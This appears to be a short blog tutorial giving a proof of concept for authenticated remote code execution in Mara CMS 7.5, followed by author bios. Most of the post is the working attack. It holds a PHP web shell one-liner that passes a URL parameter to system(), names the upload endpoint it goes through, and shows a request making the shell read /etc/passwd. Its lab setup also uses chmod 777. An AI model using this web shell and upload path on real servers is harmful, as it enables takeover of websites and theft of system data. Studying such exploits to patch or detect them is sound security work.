CVE (POC)

Mara CMS 7.5 Exploit – Remote Code Execution (Authenticated)

Hey Folks, In this tutorial we will show you the (POC) of Mara CMS 7.5 Remote Code Execution (Authenticated) Vulnerability.

About the Vulnerability

Exploit Author : Michele Cisternino (0blio_)
Download : https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
Version : 7.5
Tested on: Ubuntu

Vulnerability Setup

https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
unzip -d /var/www/html/MaraCMS75/ MaraCMS75.zip

cd /var/www/html/MaraCMS75
chmod 777 *
mv example.htaccess .htaccess

cat > webshell.php
'<?php system($_GET["cmd"]); ?>'

Full Proof of Concept

http://localhost/MaraCMS75/codebase/dir.php?type=filenew

http://localhost/MaraCMS75/img/webshell.php?cmd=cat+/etc/passwd

About the Author

Shubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.

Shubham Goyal

A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.